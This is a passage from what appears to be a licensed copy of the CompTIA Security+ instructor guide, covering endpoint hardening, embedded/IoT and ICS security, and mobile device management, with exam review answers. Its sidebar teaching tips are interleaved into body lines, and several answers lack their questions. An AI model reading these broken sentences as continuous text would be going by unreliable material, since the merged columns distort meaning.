Java updater, OEM driver updater, and so on. These issues can be mitigated by com/2017/09/14/
deploying an enterprise patch management suite. Some suites, such as Microsoft’s missed_patch_caused_
System Center Configuration Manager (SCCM)/Endpoint Manager (docs.microsoft.com/ equifax_data_breach).
en-us/mem/configmgr), are vendor-specific while others are designed to support third- Recent years have
seen leaks of tools
party applications and multiple OSs.
developed by the CIA
It can also be difficult to schedule patch operations, especially if applying the patch and other intelligence
is an availability risk to a critical system. If vulnerability assessments are continually agencies to exploit
vulnerabilities in
highlighting issues with missing patches, patch management procedures should Windows and mobile
be upgraded. If the problem affects certain hosts only, it could be an indicator of OS. This means that
compromise that should be investigated more closely. systems that are not
completely up to
Patch management can also be difficult for legacy systems, proprietary systems, and date with patches are
systems from vendors without robust security management plans, such as some types extremely high risk.
of Internet of Things devices. These systems will need compensating controls, or some
other form of risk mitigation if patches are not readily available.
Another crucial step in hardening is to configure endpoint protection for automatic Endpoint Protection
detection and prevention of malware threats. There have been many iterations of
host-based/endpoint protection suites and agents. It is important to consider the Teaching
contrasting functions performed, as individual software tools or protection suites often Tip
combine multiple functionality. Students should
hopefully be
Antivirus (A-V)/Anti-Malware comfortable with
the features and
The first generation of anti-virus (A-V) software is characterized by signature-based operation of AV
detection and prevention of known viruses. An "A-V" product will now perform scanners, so focus on
generalized malware detection, meaning not just viruses and worms, but also Trojans, advanced malware
spyware, PUPs, cryptojackers, and so on. While A-V software remains important, detection techniques.
signature-based detection is widely recognized as being insufficient for the prevention Note that we'll cover
of data breaches. DLP in more detail
later in the course.
Host-Based Intrusion Detection/Prevention (HIDS/HIPS) Interaction
Opportunity
Host-based intrusion detection systems (HIDS) provide threat detection via log and
file system monitoring. HIDS come in many different forms with different capabilities, Optionally, get the
some of them preventative (HIPS). File system integrity monitoring uses signatures to students to research
features of EPPs on
detect whether a managed file image—such as an OS system file, driver, or application different vendor sites.
executable—has changed. Products may also monitor ports and network interfaces,
and process data and logs generated by specific applications, such as HTTP or FTP.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
328 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
conflicts, creating numerous technical support incidents and security incident false
positives. An endpoint protection platform (EPP) is a single agent performing multiple
security tasks, including malware/intrusion detection and prevention, but also other
security features, such as a host firewall, web content filtering/secure search and
browsing, and file/message encryption.
2. Assign hosts to appropriate groups for policy assignment. For example, client
endpoints have very different security requirements to servers. While it may be
appropriate to use a preventative mechanism immediately to isolate a client
when a threat is detected, automatically doing this for a critical server could
cascade to loss of functionality across the network.
3. Test the different host group configuration settings to ensure that the expected
range of threats is detected.
4. Use a monitoring dashboard to verify status across all network hosts. Apart from
detection events, if the agent is disabled or missing, there should be an alert.
Note that managed detection and response (MDR) is a class of hosted security service
(digitalguardian.com/blog/what-managed-detection-and-response-definition-benefits-how-
choose-vendor-and-more).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 329
An on-access anti-virus scanner or intrusion prevention system works by identifying Antivirus Response
when processes or scripts are executed and intercepting (or hooking) the call to scan
the code first. If the code matches a signature of known malware or exhibits malware-
like behavior that matches a heuristic profile, the scanner will prevent execution and
attempt to take the configured action on the host file (clean, quarantine, erase, and so
on). An alert will be displayed to the user and the action will be logged (and also may
generate an administrative alert). The malware will normally be tagged using a vendor
proprietary string and possibly by a CME (Common Malware Enumeration) identifier.
These identifiers can be used to research the symptoms of and methods used by
the malware. This may help to confirm the system is fully remediated and to identify
whether other systems have been infected. It is also important to trace the source of
the infection and ensure that it is blocked to prevent repeat attacks and outbreaks.
Sandboxing
Sandboxing is a technique that isolates an untrusted host or app in a segregated
environment to conduct tests. Sandbox environments intentionally limit interfaces with
the host environment. The analysis of files sent to a sandbox can include determining
whether the file is malicious, how it might have affected certain systems if run outside
of the sandbox, and what dependencies it might have with external files and hosts.
Sandboxes offer more than traditional anti-malware solutions because you can apply
a variety of different environments to the sandbox instead of just relying on how the
malware might exist in your current configuration.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
330 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Endpoint Security
Answer the following questions:
A basic principle of security is to run only services that are needed. A hardened
system is configured to perform a role as client or application server with the minimal
possible attack surface, in terms of interfaces, ports, services, storage, system/registry
permissions, lack of security controls, and vulnerabilities.
The string identifying the malware. You can use this to reference the malware on the
A-V vendor's site and, hopefully, obtain manual removal and prevention advice.
Advanced persistent threat (APT) malware can use many techniques to evade
signature-based detection. A cloud analytics platform, backed by machine learning, can
apply more effective behavioral-based monitoring and alerting.
5. If you suspect a process of being used for data exfiltration but the process is
not identified as malware by A-V software, what types of analysis tools will
be most useful?
You can use a sandbox with monitoring tools to see which files the process interacts
with and a network monitor to see if it opens (or tries to open) a connection with a
remote host.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 331
Topic 12C
Explain Embedded System
Security Implications
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
332 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Implied trust means that every device that has been added to the network is trusted,
on the assumption that it was added and continues to be operated by a legitimate
administrator. Until there is widespread adoption of embedded TPM, embedded
networks have to rely on the perimeter security model.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 333
Cellular Networks
A cellular network enables long-distance communication over the same system that
supports mobile and smartphones. This is also called baseband radio, after the
baseband processor that performs the function of a cellular modem. There are several
baseband radio technologies:
• Narrowband-IoT (NB-IoT)—this refers to a low-power version of the Long Term
Evolution (LTE) or 4G cellular standard. The signal occupies less bandwidth than
regular cellular. This means that data rates are limited (20-100 kbps), but most
sensors need to send small packets with low latency, rather than making large data
transfers. Narrowband also has greater penetrating power, making it more suitable
for use in inaccessible locations, such as tunnels or deep within buildings, where
ordinary cellular connectivity would be impossible.
While not yet completely standardized, both NB-IoT and LTE-M are designed to be
compatible with 5G networks. This means they do not interfere with 5G signaling and
can use tower relays developed for 5G. They may support higher data rates, though
latency and reliability tend to be more important considerations.
Any LTE-based cellular radio uses a subscriber identity module (SIM) card as an
identifier. The SIM is issued by a cellular provider, with roaming to allow use of other
suppliers' tower relays. As a removable card is not really a suitable form factor for
embedded, an eSIM incorporates the same function as a chip on the system board or
SoC design.
Encryption of frames between the endpoint and the cell tower and within the backhaul
to Internet routers is the responsibility of the network operator. Over the air encryption
is performed by encryption schemes devised by the cellular standards body 3GPP.
Backhaul security is usually enforced using IPSec. The embedded system can use
application layer encryption for additional security.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
334 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
data bandwidth at the expense of range compared to Z-Wave and the greater risk of
interference from other 2.4 GHz radio communications. Zigbee supports more overall
devices within a single network and there is no hop limit for communication between
devices.
Both Z-Wave and Zigbee have communications encryption. The main threats are from
re-pairing attacks and from rogue devices. A re-pairing attack allows a threat actor
to discover the network key by forcing a device off the network, causing it to try to
re-connect (checkpoint.com/press/2020/the-dark-side-of-smart-lighting-check-point-
research-shows-how-business-and-home-networks-can-be-hacked-from-a-lightbulb). If
the user connects a rogue device to the network, the system depends on application-
level security to prevent the device from compromising higher value targets, such as a
smart hub, alarm, or door entry mechanism.
ICS/SCADA Applications
These types of systems are used within many sectors of industry:
• Energy refers to power generation and distribution. More widely, utilities includes
water/sewage and transportation networks.
• Industrial can refer specifically to the process of mining and refining raw materials,
involving hazardous high heat and pressure furnaces, presses, centrifuges, pumps,
and so on.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 335
systems, such as forges, mills, and assembly lines. These systems must work to
extremely high precisions.
• Logistics refers to moving things from where they were made or assembled to
where they need to be, either within a factory or for distribution to customers.
Embedded technology is used in control of automated transport and lift systems
plus sensors for component tracking.
ICS/SCADA was historically built without regard to IT security, though there is now high
awareness of the necessity of enforcing security controls to protect them, especially
when they operate in a networked environment.
One infamous example of an attack on an embedded system is the Stuxnet worm (wired.
com/2014/11/countdown-to-zero-day-stuxnet). This was designed to attack the SCADA
management software running on Windows PCs to damage the centrifuges used by Iran's
nuclear fuels program. NIST Special Publication 800-82 covers some recommendations
for implementing security controls for ICS and SCADA (nvlpubs.nist.gov/nistpubs/
SpecialPublications/NIST.SP.800-82r2.pdf).
The term Internet of Things (IoT) is used to describe a global network of appliances Internet of Things
and personal devices that have been equipped with sensors, software, and network
connectivity. This compute functionality allows these objects to communicate and Teaching
pass data between themselves and other traditional systems like computer servers. Tip
This is often referred to as Machine to Machine (M2M) communication. Each “thing” is With Internet of
identified with some form of unique serial number or code embedded within its own Things and wearable
operating or control system and is able to inter-operate within the existing Internet technology, evaluation
infrastructure either directly or via an intermediary. An IoT network will generally use of the supply chain
the following types of components: is critical. Vendors
and OEMs must be
• Hub/control system—IoT devices usually require a communications hub to facilitate assessed for their
Z-Wave or Zigbee networking. There must also be a control system, as most IoT security-awareness.
devices are headless, meaning they have no user control interface. This could be a
smart hub, with voice control, or a smartphone/PC app.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
336 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• Code injection via the graphical web application interfaces used to configure and
monitor systems. This can be used to perform JavaScript-based attacks, such as
clickjacking and cross-site scripting (XSS).
It is possible that control of these systems could be used to perform some sort of
DoS or ransom demand (consider disrupting HVAC controls within a data center, for
instance). However, as with the Target data breach, the aim is likely to access the
corporate data network from the automation and monitoring system, which may be
accessible via a supplier company (krebsonsecurity.com/tag/fazio-mechanical).
Smart Meters
A smart meter provides continually updating reports of electricity, gas, or water usage
to the supplier, reducing the need for manual inspections. Most meters use cellular
data for communication back to the supplier, and an IoT protocol, such as ZigBee, for
integration with smart appliances.
Surveillance Systems
A physical access control system (PACS) is a network of monitored locks, intruder
alarms, and video surveillance. A PACS can either be implemented as part of a building
automation system or a separate system in its own right. Gaining physical access to
premises, or even just access to video monitoring systems, gives an adversary many
opportunities to develop additional attacks. As with building automation, a PACS is likely to
be installed and maintained by an external supplier. This can lead to it being omitted from
risk and vulnerability assessments, as highlighted by the US Government Accountability
Office's 2014 report into PACS at federal offices (gao.gov/assets/670/667512.pdf).
Physical security systems use networked camera systems (CCTV) for surveillance.
Unfortunately, some makes of camera systems have been found to have numerous
serious vulnerabilities that allow attackers either to prevent intrusions from being
recorded or to hijack the cameras to perform their own surveillance. These issues
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 337
tend to affect cheap consumer-grade systems rather than enterprise models, but in
both cases it is necessary to evaluate the supplier to demonstrate that their security
monitoring and remediation support services are effective.
There are also specialized systems installed within office networks, such as printer and Specialized Systems
Voice over IP (VoIP) equipment. These systems must not be overlooked by security in IT
monitoring procedures.
Teaching
Multifunction Printers (MFPs) Tip
Most modern print devices, scanners, and fax machines have hard drives and In 2014, security
researchers hacked
sophisticated firmware, allowing their use without attachment to a computer and the web interface of a
over a network. Often these print/scan/fax functions are performed by single devices, Canon Pixma printer
referred to as multifunction printers (MFPs). Unless they have been securely deleted, and used the exploit
images and documents are frequently recoverable from all of these machines. Some of to install the 1990s
the more feature-rich, networked printers and MFPs can also be used as a pivot point first-person shooter
game Doom on the
to attack the rest of the network. These machines also have their own firmware that
printer firmware
must be kept patched and updated. (wired.com/2014/09/
doom-printer).
Voice over IP (VoIP)
Types of embedded systems are used to implement both Voice over IP (VoIP) endpoints
and media gateways. Endpoints can be individual handsets or conferencing units.
A media gateway might use a separate firmware/OS to implement integration with
telephone and cellular networks.
Where these devices connect directly to the Internet, a fingerprinting app or website
(shodan.io/explore/tag/voip or shodan.io/explore/tag/printer, for instance) can be used to
probe for unpatched vulnerabilities. There are Shodan queries for any number of IoT and
ICS devices.
Shodan search results for sites responding to probes over port 9100 (TCP port for raw print data).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
338 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Specialized Systems
for Medical Devices Specialized Systems for Medical Devices
Teaching
Medical devices represent an array of systems potentially vulnerable to a wide range
Tip
of attacks. It is important to recognize that use of these devices is not confined
to hospitals and clinics but includes portable devices such as cardiac monitors/
You can reference
the recall of certain
defibrillators and insulin pumps. As well as unsecure communication protocols, many
types of pacemaker of the control systems for these devices run on unsupported versions of operating
(csoonline.com/article/ systems (such as Windows XP) because the costs of updating the software to work
3222068/465000- with newer OS versions is high and disruptive to patient services. Some of the goals of
abbott-pacemakers- attacks on medical devices and services are as follows:
vulnerable-to-hacking-
need-a-firmware-fix. • Use compromised devices to pivot to networks storing medical data with the aim of
html) for a firmware stealing protected health information (PHI).
update to fix a
vulnerability that could • Hold medical units ransom by threatening to disrupt services.
allow an attacker to
drain the device's • Kill or injure patients (or threaten to do so) by tampering with dosage levels or
battery. device settings.
Show Slide(s)
Security for Embedded Systems
Security for Embedded Embedded systems must not be overlooked when designing the security system. The
Systems following methods can be used to mitigate risk in such environments.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 339
Wrappers
One way of increasing the security of data in transit for embedded systems is through the
use of wrappers, such as IPSec. The only thing visible to an attacker or anyone sniffing
the wire is the IPSec header, which describes only the tunnel endpoints. This is useful
for protecting traffic between trusted networks when the traffic has to go through an
untrusted network to go between them, or between trusted nodes on the same network.
• Many embedded systems require manual updates, which are perceived as too time-
consuming for a security department with other priorities to perform.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
340 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Embedded System Security Implications
Answer the following questions:
False—these are examples of one-board computers based on the system on chip (SoC)
design. They are widely used in education (and leisure). Some are used for industrial
applications or for proof-of-concept designs, but most embedded systems are
manufactured to specific requirements.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 341
Lesson 12
Summary
You should be able to apply host hardening policies and technologies and to assess Teaching
risks from third-party supply chains and embedded/IoT systems. Tip
Check that students
Guidelines for Implementing Host Security Solutions are confident about
the content that has
been covered. If there
Follow these guidelines when you deploy or re-assess endpoint security and integration
is time, re-visit any
with embedded or IoT systems: content examples that
• Assess third-party risks and ensure that appropriate procedures and agreements they have questions
about. If you have
(MOU, NDA, SLA, BPA, MSA) are used to onboard approved vendors and partners as used all the available
technology and solutions providers. time for this lesson
block, note the issues,
• Establish configuration baselines for each host type. Ensure that hosts are deployed and schedule time for
to the configuration baseline and set up monitoring to ensure compliance. a review later in the
course.
• Configure secure boot options and consider the use of attestation and policy
servers as the basis of a network access control mechanism. Interaction
Opportunity
• Configure storage encryption using full disk or self-encrypting drives. Optionally, ask
students if they have
• Deploy an endpoint protection solution that meets security requirements for experience either of
functions such as anti-malware, firewall, IDS, EDR, and DLP. ICS/SCADA system
or BACS. Ask if IoT
• Establish patch management procedures to test updates for different host groups devices are present in
and ensure management of both OS and third-party software. their workplace, and
whether there is a
• Create a management plan for any IoT devices used in the workplace and ensure management plan for
there is no "shadow IT" deployment of unmanaged appliances. them.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Lesson 13
Implementing Secure Mobile Solutions
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
344 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 13A
Implement Mobile Device Management
• Choose your own device (CYOD)—much the same as COPE but the employee is
given a choice of device from a list.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 345
Enterprise mobility management (EMM) is a class of management software designed Enterprise Mobility
to apply security policies to the use of mobile devices and apps in the enterprise. The Management
challenge of identifying and managing attached devices is often referred to as visibility.
EMM software can be used to manage enterprise-owned devices as well as BYOD. Teaching
There are two main functions of an EMM product suite: Tip
• Mobile device management (MDM)—sets device policies for authentication, At this point, MDM
and MAM are probably
feature use (camera and microphone), and connectivity. MDM can also allow device
best thought of as
resets and remote wipes. functionality within
products, rather than
• Mobile application management (MAM)—sets policies for apps that can process product classes.
corporate data, and prevents data transfer to personal apps. This type of solution Note the trend toward
configures an enterprise-managed container or workspace. unified endpoint
management,
Additionally, distinguishing whether client endpoints are mobile or fixed is not really including IoT devices.
a critical factor for many of these management tasks, with the consequence that
the latest suites aim for visibility across PC, laptop, smartphone, tablet, and even IoT Interaction
devices. These suites are called unified endpoint management (UEM) (redmondmag. Opportunity
com/Articles/2017/10/01/Unified-Endpoint-Management.aspx). Encourage students
to browse the vendor
The core functionality of endpoint management suites extends the concept of sites referenced in the
network access control (NAC) solutions. The management software logs the use of a text to get a better
device on the network and determines whether to allow it to connect or not, based idea of the features
on administrator-set parameters. When the device is enrolled with the management and capabilities of
software, it can be configured with policies to allow or restrict use of apps, corporate EMM/UEM suites.
data, and built-in functions, such as a video camera or microphone.
Some EMM/UEM solutions include AirWatch (air-watch.com), Microsoft Intune
(microsoft.com/en-us/microsoft-365/enterprise-mobility-security/microsoft-intune),
Symantec/Broadcom (broadcom.com/products/cyber-security/endpoint/end-user/
protection-mobile), and Citrix Endpoint Management (formerly XenMobile) (citrix.com/
products/citrix-endpoint-management).
In Apple's iOS ecosystem, third-party developers can create apps using Apple's iOS in the Enterprise
Software Development Kit, available only on MacOS. Apps have to be submitted to
and approved by Apple before they are released to users via the App Store. Corporate Teaching
control over iOS devices and distribution of corporate and B2B (Business-to-Business) Tip
apps is facilitated by participating in the Device Enrollment Program (support.apple. Remind students of
com/business), the Volume Purchase Program, and the Developer Enterprise Program the importance of
(developer.apple.com/programs/enterprise). Another option is to use an EMM suite keeping developer
and its development tools to create a "wrapper" for the corporate app. accounts secure.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
346 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Most iOS attacks are the same as with any system; users click malicious links or enter
information into phishing sites, for instance. As a closed and proprietary system, it
should not be possible for malware to infect an iOS device as all code is updated from
Apple's servers only. There remains the risk that a vulnerability in either iOS or an app
could be discovered and exploited. In this event, users would need to update iOS or the
app to a version that mitigates the exploit.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 347
iOS devices are normally updated very quickly. With Android, the situation is less
consistent, as updates often depend on the handset vendor to complete the new
version or issue the patch for their flavor of Android. Android OS is more open and
there is Android malware, though as with Apple it is difficult for would-be hackers and
spammers to get it into any of the major app repositories.
One technique used is called Staged Payloads. The malware writers release an app that
appears innocuous in the store but once installed it attempts to download additional
components infected with malware (zdnet.com/article/android-security-sneaky-three-stage-
malware-found-in-google-play-store). Google has implemented a server-side malware
scanning product (Play Protect) that will both warn users if an app is potentially damaging
and scan apps that have already been purchased, and warn the user if any security issues
have been discovered.
Since version 4.3, Android has been based on Security-Enhanced Linux. SEAndroid
(source.android.com/security/selinux) uses mandatory access control (MAC) policies to
run apps in sandboxes. When the app is installed, access is granted (or not) to specific
shared features, such as contact details, SMS texting, and email.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
348 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Configuring authentication and profile policies using Intune EMM—Note that the policy allows the user
to have a different type of authentication (or none at all) to the workspace hosting corporate apps
and data. (Screenshot used with permission from Microsoft.)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 349
Strong passwords should always be set on mobile devices, as simple 4-digit PIN codes can
easily be brute-forced. Swipe patterns are vulnerable to poor user choices (arstechnica.
com/information-technology/2015/08/new-data-uncovers-the-surprising-predictability-of-
android-lock-patterns), such as choosing letter or box patterns, plus the tendency for the
grease trail to facilitate a smudge attack.
Screen Lock
The screen lock can also be configured with a lockout policy. This means that if an
incorrect passcode is entered, the device locks for a set period. This could be configured
to escalate (so the first incorrect attempt locks the device for 30 seconds while the third
locks it for 10 minutes, for instance). This deters attempts to guess the passcode.
Context-Aware Authentication
It is also important to consider newer authentication models, such as context-aware
authentication. For example, smartphones now allow users to disable screen locks
when the device detects that it is in a trusted location, such as the home. Conversely,
an enterprise may seek more stringent access controls to prevent misuse of a device.
For example, even if the device has been unlocked, accessing a corporate workspace
might require the user to authenticate again. It might also check whether the network
connection can be trusted (that it is not an open Wi-FI hotspot, for instance).
A remote wipe or kill switch means that if the handset is stolen it can be set to the Remote Wipe
factory defaults or cleared of any personal data (sanitization). Some utilities may also
be able to wipe any plug-in memory cards too. The remote wipe could be triggered by
several incorrect passcode attempts or by enterprise management software. Other
features include backing up data from the phone to a server first and displaying a
"Lost/stolen phone—return to XX" message on the handset.
Most corporate messaging systems come with a remote wipe feature (such as this one provided with
Intermedia mail hosting), allowing mail, calendar, and contacts information to be deleted from mobile
devices. (Screenshot used with permission from Intermedia.)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
350 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
In theory, a thief can prevent a remote wipe by ensuring the phone cannot connect to
the network, then hacking the phone and disabling the security.
Location services is available to any app where the user has granted the app
permission to use it.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 351
Using Find My Device to locate an Android smartphone. (Android is a trademark of Google LLC.)
The primary concern surrounding location services is one of privacy. Although very
useful for maps and turn-by-turn navigation, it provides a mechanism to track an
individual's movements, and therefore their social and business habits. The problem
is further compounded by the plethora of mobile apps that require access to location
services and then both send the information to the application developers and store
it within the device's file structure. If an attacker can gain access to this data, then
stalking, social engineering, and even identity theft become real possibilities.
Restricting device permissions such as camera and screen capture using Intune.
(Screenshot used with permission from Microsoft.)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
352 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
GPS Tagging
GPS tagging is the process of adding geographical identification metadata, such as
the latitude and longitude where the device was located at the time, to media such as
photographs, SMS messages, video, and so on. It allows the app to place the media
at specific latitude and longitude coordinates. GPS tagging is highly sensitive personal
information and potentially confidential organizational data also. GPS tagged pictures
uploaded to social media could be used to track a person's movements and location.
For example, a Russian soldier revealed troop positions by uploading GPS tagged
selfies to Instagram (arstechnica.com/tech-policy/2014/08/opposite-of-opsec-russian-
soldier-posts-selfies-from-inside-ukraine).
Endpoint management software such as Microsoft Intune can be used to approve or prohibit apps.
(Screenshot used with permission from Microsoft.)
A trusted app source is one that is managed by a service provider. The service provider
authenticates and authorizes valid developers, issuing them with a certificate to use
to sign their apps and warrant them as trusted. It may also analyze code submitted to
ensure that it does not pose a security or privacy risk to its customers (or remove apps
that are discovered to pose such a risk). It may apply other policies that developers
must meet, such as not allowing apps with adult content or apps that duplicate the
function of core OS apps.
The mobile OS defaults to restricting app installations to the linked store (App Store for
iOS and Play for Android). Most consumers are happy with this model but it does not
work so well for enterprises. It might not be appropriate to deliver a custom corporate
app via a public store, where anyone could download it. Apple operates enterprise
developer and distribution programs to solve this problem, allowing private app
distribution via Apple Business Manager (developer.apple.com/business/distribute).
Google's Play store has a private channel option, called Managed Google Play. Both
these options allow an EMM/UEM suite to push apps from the private channel to
the device.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 353
Unlike iOS, Android allows for selection of different stores and installation of untrusted
apps from any third party, if this option is enabled by the user. With unknown sources
enabled, untrusted apps can be downloaded from a website and installed using the
.apk file format. This is referred to as sideloading.
Conversely, a management suite might be used to prevent the use of third-party stores
or sideloading and block unapproved app sources.
Containerization allows the employer to manage and maintain the portion of the Content Management
device that interfaces with the corporate network. An enterprise workspace with a
defined selection of apps and a separate container is created. This container isolates Teaching
corporate apps from the rest of the device. There may be a requirement for additional Tip
authentication to access the workspace. Note that the
security of these
The container can also enforce storage segmentation. With storage segmentation the
containerization
container is associated with a directory on the persistent storage device that is not mechanisms depends
readable or writable by apps that are not in the container. Conversely, apps cannot upon the device not
write to areas outside the container, such as external media or using copy and paste being rooted.
to a non-container app. App network access might be restricted to a VPN tunneled
through the organization's security system.
The enterprise is thereby able to maintain the security it needs, without having to
enforce policies that affect personal use, apps, or data.
Containerization also assists content management and data loss prevention (DLP)
systems. A content management system tags corporate or confidential data and
prevents it from being shared or copied to unauthorized external media or channels,
such as non-corporate email systems or cloud storage services.
Like Windows and Linux, the account used to install the OS and run kernel-level Rooting and
processes is not the one used by the device owner. Users who want to avoid the Jailbreaking
restrictions that some OS vendors, handset OEMs, and telecom providers (carriers) put
on the devices must use some type of privilege escalation: Teaching
Tip
• Rooting—this term is associated with Android devices. Some vendors provide
authorized mechanisms for users to access the root account on their device. For Detecting whether
a device has been
some devices it is necessary to exploit a vulnerability or use custom firmware. rooted is not
Custom firmware is essentially a new Android OS image applied to the device. This straightforward.
can also be referred to as a custom ROM, after the term for the read only memory You might want to
chips that used to hold firmware. point students to
Google's attestation
• Jailbreaking—iOS is more restrictive than Android so the term "jailbreaking" API documentation
became popular for exploits that enabled the user to obtain root privileges, for more information
on root detection
sideload apps, change or add carriers, and customize the interface. iOS jailbreaking
(developer.android.
is accomplished by booting the device with a patched kernel. For most exploits, com/training/
this can only be done when the device is attached to a computer when it boots safetynet/attestation).
(tethered jailbreak).
• Carrier unlocking—for either iOS or Android, this means removing the restrictions
that lock a device to a single carrier.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
354 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
If the user has applied a custom firmware image, they could have removed the
protections that enforce segmentation. The device can no longer be assumed to run a
trusted OS.
EMM/UEM has routines to detect a rooted or jailbroken device or custom firmware with
no valid developer code signature and prevent access to an enterprise app, network,
or workspace. Containerization and enterprise workspaces can use cryptography to
protect the workspace in a way that is much harder to compromise than a local agent,
even from a rooted/jailbroken device.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 355
Review Activity:
Mobile Device Management
Answer the following questions:
1. What type of deployment model(s) allow users to select the mobile device
make and model?
Bring Your Own Device (BYOD) and Choose Your Own Device (CYOD).
Virtual Desktop Infrastructure (VDI) allows a client device to access a VM. In this
scenario, the mobile device is the client device. Corporate data is stored and processed
on the VM so there is less chance of it being compromised, even though the client
device itself is not fully managed.
3. Company policy requires that you ensure your smartphone is secured from
unauthorized access in case it is lost or stolen. To prevent someone from
accessing data on the device immediately after it has been turned on, what
security control should be used?
Screen lock.
4. An employee's car was recently broken into, and the thief stole a company
tablet that held a great deal of sensitive data. You've already taken the
precaution of securing plenty of backups of that data. What should you do
to be absolutely certain that the data doesn't fall into the wrong hands?
5. What is containerization?
The user installs an app directly onto the device rather than from an official app store.
7. Why might a company invest in device control software that prevents the
use of recording devices within company premises?
Enterprise Mobility Management (EMM) solutions depend on the device user not
being able to override their settings or change the effect of the software. A rooted or
jailbroken device means that the user could subvert the access controls.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
356 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 13B
Implement Secure Mobile
Device Connections
Locking down Android connectivity methods with Intune—note that most settings can be applied only
to Samsung KNOX-capable devices. (Screenshot used with permission from Microsoft.)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 357
individuals can do about these weaknesses. The attacks require a high degree of
sophistication and are relatively uncommon.
Mobile devices usually default to using a Wi-Fi connection for data, if present. If the Wi-Fi and Tethering
user establishes a connection to a corporate network using strong WPA3 security, Connection Methods
there is a fairly low risk of eavesdropping or man-in-the-middle attacks. The risks from
Wi-Fi come from users connecting to open access points or possibly a rogue access
point imitating a corporate network. These allow the access point owner to launch any
number of attacks, even potentially compromising sessions with secure servers (using
a DNS spoofing attack, for instance).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
358 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Pairing a computer with a smartphone. (Screenshot used with permission from Microsoft.)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 359
It is also the case that using a control center toggle may not actually turn off the Bluetooth
radio on a mobile device. If there is any doubt about patch status or exposure to
vulnerabilities, Bluetooth should be fully disabled through device settings.
Infrared signaling has been used for PAN in the past (IrDA), but the use of infrared in Infrared and RFID
modern smartphones and wearable technology focuses on two other uses: Connection Methods
• IR blaster—this allows the device to interact with an IR receiver and operate a device
such as a TV or HVAC monitor as though it were the remote control handset.
Teaching
Near Field Communications and Mobile Payment Services Tip
Sophos Security has
NFC is based on a particular type of radio frequency ID (RFID). NFC sensors and
produced a video
functionality are now commonly incorporated into smartphones. An NFC chip can about NFC card
also be used to read passive RFID tags at close range. It can also be used to configure skimming (facebook.
